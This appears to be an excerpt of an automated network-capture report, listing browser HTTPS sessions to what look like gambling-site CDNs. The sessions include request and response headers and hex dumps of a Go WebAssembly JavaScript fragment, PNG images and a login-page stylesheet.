                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 63 6f 6e 73 74 20 69 64 20 3d 20 6d 65 6d 28 29 2e 67 65 74 55 69 6e 74 33 32 28 76 5f 61 64 64 72 2c 20 74 72 75 65 29 3b 0a 09 09 09 09 09 09 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 2d 2d 3b 0a 09 09 09 09 09 09 69 66 20 28 74 68 69 73 2e 5f 67 6f 52 65 66 43 6f 75 6e 74 73 5b 69 64 5d 20 3d 3d 3d 20 30 29 20 7b 0a 09 09 09 09 09 09 09 63 6f 6e 73 74 20 76 20 3d 20 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 76 61 6c 75 65 73 5b 69 64 5d 20 3d 20 6e 75 6c 6c 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 73 2e 64 65 6c 65 74 65 28 76 29 3b 0a 09 09 09 09 09 09 09 74 68 69 73 2e 5f 69 64 50 6f 6f 6c 2e 70 75 73 68 28 69 64 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a
                                                                                                                                                          Data Ascii: const id = mem().getUint32(v_addr, true);this._goRefCounts[id]--;if (this._goRefCounts[id] === 0) {const v = this._values[id];this._values[id] = null;this._ids.delete(v);this._idPool.push(id);}},
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 76 61 6c 75 65 53 65 74 49 6e 64 65 78 28 76 20 72 65 66 2c 20 69 20 69 6e 74 2c 20 78 20 72 65 66 29 0a 09 09 09 09 09 22 73 79 73 63 61 6c 6c 2f 6a 73 2e 76 61 6c 75 65 53 65 74 49 6e 64 65 78 22 3a 20 28 76 5f 61 64 64 72 2c 20 69 2c 20 78 5f 61 64 64 72 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 52 65 66 6c 65 63 74 2e 73 65 74 28 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 2c 20 69 2c 20 6c 6f 61 64 56 61 6c 75 65 28 78 5f 61 64 64 72 29 29 3b 0a 09 09 09 09 09 7d 2c 0a 0a 09 09 09 09 09 2f 2f 20 66 75 6e 63 20 76 61 6c 75 65 43 61 6c 6c 28 76 20 72 65 66 2c 20 6d 20 73 74 72 69 6e 67 2c 20 61 72 67 73 20 5b 5d 72 65 66 29 20 28 72 65 66 2c 20 62 6f 6f 6c 29 0a 09 09 09 09 09 22 73 79 73 63
                                                                                                                                                          Data Ascii: ;},// valueSetIndex(v ref, i int, x ref)"syscall/js.valueSetIndex": (v_addr, i, x_addr) => {Reflect.set(loadValue(v_addr), i, loadValue(x_addr));},// func valueCall(v ref, m string, args []ref) (ref, bool)"sysc
                                                                                                                                                          2024-06-09 22:41:22 UTC1369INData Raw: 73 74 20 76 20 3d 20 6c 6f 61 64 56 61 6c 75 65 28 76 5f 61 64 64 72 29 3b 0a 09 09 09 09 09 09 63 6f 6e 73 74 20 61 72 67 73 20 3d 20 6c 6f 61 64 53 6c 69 63 65 4f 66 56 61 6c 75 65 73 28 61 72 67 73 5f 70 74 72 2c 20 61 72 67 73 5f 6c 65 6e 2c 20 61 72 67 73 5f 63 61 70 29 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 76 2c 20 61 72 67 73 29 29 3b 0a 09 09 09 09 09 09 09 6d 65 6d 28 29 2e 73 65 74 55 69 6e 74 38 28 72 65 74 5f 61 64 64 72 20 2b 20 38 2c 20 31 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0a 09 09 09 09 09 09 09 73 74 6f 72 65 56 61 6c 75 65 28 72 65 74 5f 61 64 64 72 2c 20 65 72
                                                                                                                                                          Data Ascii: st v = loadValue(v_addr);const args = loadSliceOfValues(args_ptr, args_len, args_cap);try {storeValue(ret_addr, Reflect.construct(v, args));mem().setUint8(ret_addr + 8, 1);} catch (err) {storeValue(ret_addr, er


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          659192.168.2.55043890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC607OUTGET /pc/image-pc/index/312/nav/sports/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC630INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 45166
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:50 GMT
                                                                                                                                                          ETag: "6214aa7a-b06e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE10[291],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,288],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465100
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: deabf4f5180913784a2930d1b4dd4276
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105852
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15754INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: cf 42 96 40 c4 9e 46 27 4a b2 c9 89 d0 4b a4 c1 44 84 e3 12 86 fc 31 cc 25 2d 53 59 44 66 d6 6c 84 de a4 83 46 13 47 22 d0 0a c5 58 86 da 4a 07 24 32 d1 17 cc e6 51 5b 5b 8e 96 56 13 2a 0b 04 f8 02 7e e2 86 e4 11 9b 4b e0 4a f4 d0 b9 15 ea 3c 75 58 bd b8 02 43 e1 18 4e 77 f4 e2 d3 eb 66 a0 63 cd 65 38 de fc 08 0c 26 03 0e b6 f5 60 c8 17 c4 f2 ba 4a 72 8a 22 38 d4 d2 8e 25 d3 4b d1 ee d3 e2 a1 9f fd 01 37 5d d7 07 cb ec af e2 07 3f fe 26 3e 77 e3 67 f1 f5 bf 1b c0 d2 4b ef c6 6b 5b bb 70 e7 b5 39 58 30 c3 46 20 0d c1 6c 31 12 57 34 60 eb fe 42 44 bc 5e 84 c2 01 fc f2 79 42 51 9e 11 d9 39 d6 4b 27 09 7f 1a f2 ec 86 4b 13 1c 39 b0 b1 64 47 2c 11 3f 40 d8 0f 66 07 47 0f 39 cc a6 95 9d be 71 b9 d2 70 44 61 19 97 98 ca db 44 8d 79 24 46 52 92 48 c4 7a a7 df fb
                                                                                                                                                          Data Ascii: B@F'JKD1%-SYDflFG"XJ$2Q[[V*~KJ<uXCNwfce8&`Jr"8%K7]?&>wgKk[p9X0F l1W4`BD^yBQ9K'K9dG,?@fG9qpDaDy$FRHz
                                                                                                                                                          2024-06-09 22:41:23 UTC13028INData Raw: 00 28 86 b0 89 c0 ae 66 04 a2 f9 77 7e 8e 67 27 18 1a d5 24 62 87 3c f7 c0 e9 28 e0 fe cf 5d 8a 17 0f 64 f0 85 1f 7d 1b 1b d6 af 17 9d 50 1c 82 30 7a 81 4a 82 c6 82 89 a1 6d fe 30 5d b7 05 19 da 10 d6 23 db b0 6d 7b 27 86 14 0f ea fd 5e ec 25 c1 9f 43 98 b5 96 90 71 9f 18 b5 42 ce 4d b5 0f 3d 23 c3 88 8d 8c a3 8a ae 9f 1b 56 38 40 cb c9 f7 fe 9e 1e 94 c8 21 e0 ac 41 c3 ac 39 b4 86 26 f4 4f 26 60 56 3b e1 71 99 30 74 88 4b e2 73 a8 6c 0a 23 3f 91 bf a7 72 fd 0b d3 ba 9a d6 7d f6 bf a0 49 0a 1f 56 5d 76 9c 42 7b 6e 85 0c 55 4a 46 47 26 fc be 98 ae e9 b4 21 4f 72 38 7d 0e a4 e3 33 63 b3 2e f2 f8 15 bd 40 4a cb 8d 7f 34 ce 36 2d 96 e7 ad 5e 7c 8e 49 37 0f 39 73 23 4f 26 2d 9e a4 97 67 20 68 13 46 9c c5 24 7f 5b d3 4b d7 6b 16 85 b0 bc 15 2e 9b 03 7e 39 8d 65
                                                                                                                                                          Data Ascii: (fw~g'$b<(]d}P0zJm0]#m{'^%CqBM=#V8@!A9&O&`V;q0tKsl#?r}IV]vB{nUJFG&!Or8}3c.@J46-^|I79s#O&-g hF$[Kk.~9e


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          660192.168.2.55044023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC605OUTGET /pc/image-pc/index/382/slot/10042.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2279
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:15 GMT
                                                                                                                                                          ETag: "64c0a20b-8e7"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[6],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE26[3],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473789
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: eb1888bfbdf3c3d649ef223f6f5ff95f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118211
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC2279INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66
                                                                                                                                                          Data Ascii: PNGIHDRw=pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          661192.168.2.55044190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC645OUTGET /pc/image-pc/index/125/top/icon_2.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 386
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 02:48:02 GMT
                                                                                                                                                          ETag: "64bf37e2-182"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE18[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063153
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5a137478b9cbfff3b6cc8a1cdeb2ffe8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528847
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC386INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 34 49 44 41 54 38 8d 8d d3 bf 4b 95 51 1c c7 f1 ef e3 85 ae 8a 4b 86 20 e8 98 e0 5f 60 d3 ad dd 21 70 b1 dd cd 49 c4 b9 a1 25 07 9d 82 a8 c1 45 70 91 50 ae 5b 53 63 b4 d7 da 54 10 e8 d0 92 c2 c5 f0 e5 70 cf a1 d3 c3 79 e0 7e e0 f0 70 be 3f de 3c df cf 39 a7 41 24 cd 45 c4 20 22 7e 47 c4 97 98 54 78 88 3e 02 0d 8e b1 97 f6 5d 6b 1a ab 88 c0 8b 56 72 1d 23 2c 74 34 37 38 c1 30 03 4e d3 5f e4 82 57 c6 7a d2 01 d8 4f f9 41 06 1c e0 2b 76 f1 0e 7f 71 83 f9 4a f3 36 be e3 3c c7 b2 07 df fc af 5f 78 dc 6a 7e 5e c4 9b 12 90 4d d9 c4 0e 3e 25 c8 25 d6 52 7e 09 57 b5 b1 6a 33 ce e2 63 82 fc 49 a6
                                                                                                                                                          Data Ascii: PNGIHDRapHYs4IDAT8KQK _`!pI%EpP[ScTpy~p?<9A$E "~GTx>]kVr#,t4780N_WzOA+vqJ6<_xj~^M>%%R~Wj3cI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          662192.168.2.550439183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC641OUTGET /061410/rcenter/msites/themes/default/login.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC663INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 4759
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-02-18
                                                                                                                                                          ETag: "655579ca-1297"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:23 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xymp02:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XY-MP-02-18
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-28
                                                                                                                                                          X-Cdn-Request-ID: 7d30dd13c043be92a1c16817a6aa5c38
                                                                                                                                                          2024-06-09 22:41:23 UTC4759INData Raw: 62 6f 64 79 2e 6c 6f 67 69 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 2e 2e 2f 2e 2e 2f 69 6d 61 67 65 73 2f 6c 6f 67 69 6e 2d 62 67 2e 6a 70 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 61 74 74 61 63 68 6d 65 6e 74 3a 66 69 78 65 64 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 2d 6d 6f 7a 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 2d 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 6c
                                                                                                                                                          Data Ascii: body.login{background-image:url(../../images/login-bg.jpg);background-position:center center;background-repeat:no-repeat;background-attachment:fixed;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover}.l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          663192.168.2.55044290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC606OUTGET /pc/image-pc/index/312/nav/sports/e.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:23 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:23 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 44921
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:53 GMT
                                                                                                                                                          ETag: "5d71fe85-af79"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE3[4],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465099
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 343a61c882546f27bb4e98e9d5fc1b2d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126901
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:23 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRuatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 6c 0d 3f af a1 01 9b 16 72 14 5b 45 75 16 41 f1 58 86 b2 96 82 c4 69 17 c2 f1 5c 15 76 dc 7f 27 b8 f9 51 48 a1 eb a1 78 5d 34 a2 41 c5 46 ae 18 cd 20 87 72 39 b3 60 48 81 ba e5 fa 11 54 87 34 61 9f 89 c8 13 c1 d1 9e 6c 6e 81 6a ad c2 11 7b 32 b8 28 a2 23 c5 eb 28 f9 1e 97 80 b3 1e ce f0 00 fe 3e 8d fc 8c 98 95 01 52 13 7a 80 68 14 b6 3c 70 0f 98 fb b7 71 fc ad b9 77 09 74 ad dc 00 bb 9f 7a 0a 6f bf 0f 09 4f e2 18 a1 80 08 9b 58 7e 16 f4 ac 5a 0f f7 6f bc 1b 3a da 5a f1 1c 6c 78 66 e7 71 fc 9d 02 4b d7 6e 80 7a 7e 1c 2c 3d 87 d7 c4 e0 8a 0f 07 39 56 bd 8e c7 88 aa 35 89 6e 42 a6 d2 2c 0b a6 8b 13 1a 33 9a 93 c0 a1 ed fb a9 68 e8 15 04 28 4f 16 c1 8f 21 22 2b 22 e8 46 0d d1 55 81 95 6b 57 82 9b 5d c2 13 1a d6 9e de f4 86 b1 91 51 ad a3 ab 73 66 b8 4b 51 15
                                                                                                                                                          Data Ascii: l?r[EuAXi\v'QHx]4AF r9`HT4alnj{2(#(>Rzh<pqwtzoOX~Zo:ZlxfqKnz~,=9V5nB,3h(O!"+"FUkW]QsfKQ
